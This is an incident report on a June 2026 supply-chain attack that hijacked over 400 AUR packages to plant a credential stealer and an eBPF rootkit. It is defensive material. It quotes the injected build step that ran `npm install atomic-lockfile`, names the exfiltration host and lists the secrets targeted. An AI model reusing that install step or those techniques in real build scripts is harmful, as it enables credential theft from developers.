Full Report
Attackers took over more than 400 packages in the Arch User Repository (AUR) this week and rewrote their build scripts to install a credential stealer on any machine that built them. The malware is a Rust binary built to harvest developer secrets. When it lands with root, it can also load an eBPF rootkit to hide itself. The AUR is Arch Linux's community package collection, and it is separate
Analysis Summary
# Incident Report: Atomic Arch Supply Chain Attack
## Executive Summary
In June 2026, a massive supply chain attack dubbed "Atomic Arch" compromised over 400 packages in the Arch User Repository (AUR). Attackers adopted orphaned projects and modified build scripts to deploy a Rust-based credential stealer and an optional eBPF rootkit. The incident targeted developer environments to harvest secrets, SSH keys, and session tokens, impacting any user who built the compromised packages during the window of infection.
## Incident Details
- **Discovery Date:** June 12, 2026
- **Incident Date:** Began approximately June 11, 2026
- **Affected Organization:** Arch User Repository (AUR) Community
- **Sector:** Technology / Software Development
- **Geography:** Global
## Timeline of Events
### Initial Access
- **Date/Time:** June 11, 2026
- **Vector:** Exploitation of the AUR "orphan" policy.
- **Details:** Attackers identified abandoned (orphaned) packages and legally "adopted" them as new maintainers. This bypassed the need for a system-level breach of Arch Linux infrastructure.
### Lateral Movement
- **Technique:** Supply Chain Injection.
- **Details:** Once in control of the packages, attackers updated the `PKGBUILD` or `.install` scripts. These scripts were modified to execute `npm install atomic-lockfile`, which downloaded a malicious npm package containing the "deps" binary.
### Data Exfiltration/Impact
- **Assets:** The malware targeted browser cookies/tokens (Chromium-based), Electron session data (Slack, Discord, Teams), developer secrets (GitHub, npm, HashiCorp Vault), OpenAI API keys, SSH keys, shell histories, and VPN profiles.
- **Impact:** Compromised data was exfiltrated via HTTP to `temp[.]sh`.
### Detection & Response
- **Discovery:** Identified by security researchers (Sonatype and Whanos) and community members noticing suspicious modifications to build scripts.
- **Response Actions:** Malicious npm packages were pulled from the npm registry; Arch Linux Trusted Users began reverting/deleting compromised AUR entries; community-maintained lists of affected packages were published.
## Attack Methodology
- **Initial Access:** Adoption of orphaned community packages.
- **Persistence:** Installation of `systemd` services with `Restart=always` at both the system level (if root) or user level.
- **Privilege Escalation:** Not inherently part of the payload; the malware utilized existing privileges of the user running the build script.
- **Defense Evasion:** Use of an optional eBPF rootkit (when root) to hide PIDs, socket inodes, and process names; spoofing Git commit metadata to mimic legitimate maintainers.
- **Credential Access:** Scraping local storage, config files, and shell history for tokens and keys.
- **Collection:** Automated searching for specific developer-centric file paths and database files.
- **Exfiltration:** Data sent to `temp[.]sh` with C2 communication routed through a Tor onion service via a local loopback proxy.
- **Impact:** Potential permanent host compromise via rootkit and secondary payloads (possible cryptominer).
## Impact Assessment
- **Financial:** Indirect costs related to credential rotation and incident response for affected development firms.
- **Data Breach:** Extensive theft of developer-specific credentials and internal session tokens.
- **Operational:** Disruption to developer workflows and trust in the AUR ecosystem.
- **Reputational:** Significant blow to the community-driven trust model of the Arch User Repository.
## Indicators of Compromise
- **Network:** Outbound connections to `temp[.]sh` and Tor-related loopback traffic.
- **File Indicators:**
- `[email protected]` (npm package)
- `deps` (Linux ELF binary)
- Pinned BPF maps: `hidden_pids`, `hidden_names`, `hidden_inodes`
- **Behavioral:** Unauthorized `systemd` service creation; `npm` execution during non-JS package builds.
## Response Actions
- **Containment:** Removal of the `atomic-lockfile` package from npm.
- **Eradication:** Deletion of hijacked packages from the AUR.
- **Recovery:** Users advised to audit all AUR packages updated after June 11 and rotate all potentially exposed secrets (SSH, GitHub, etc.).
## Lessons Learned
- **Orphan Policy Risks:** Automated or low-friction adoption of orphaned packages provides a platform for "repo-jacking."
- **Build Script Vulnerability:** Users often trust the source code of a package but fail to audit the build instructions (`PKGBUILD`), which run with the same permissions as the user.
- **Trust Model Limits:** Name-based trust and historical reputation are insufficient if the ownership of a package can change without a rigorous vetting process.
## Recommendations
- **Pre-Build Auditing:** Use tools to inspect `PKGBUILD` files before execution (e.g., `pkgctl` or manual review).
- **Sandboxed Builds:** Build AUR packages in isolated containers or chroots to prevent malware from accessing the main host's home directory.
- **Credential Management:** Use hardware security keys (FIDO2) for GitHub and SSH to mitigate the impact of file-based credential theft.
- **AUR Policy Change:** Implement a mandatory "waiting period" or manual review for new maintainers taking over orphaned packages.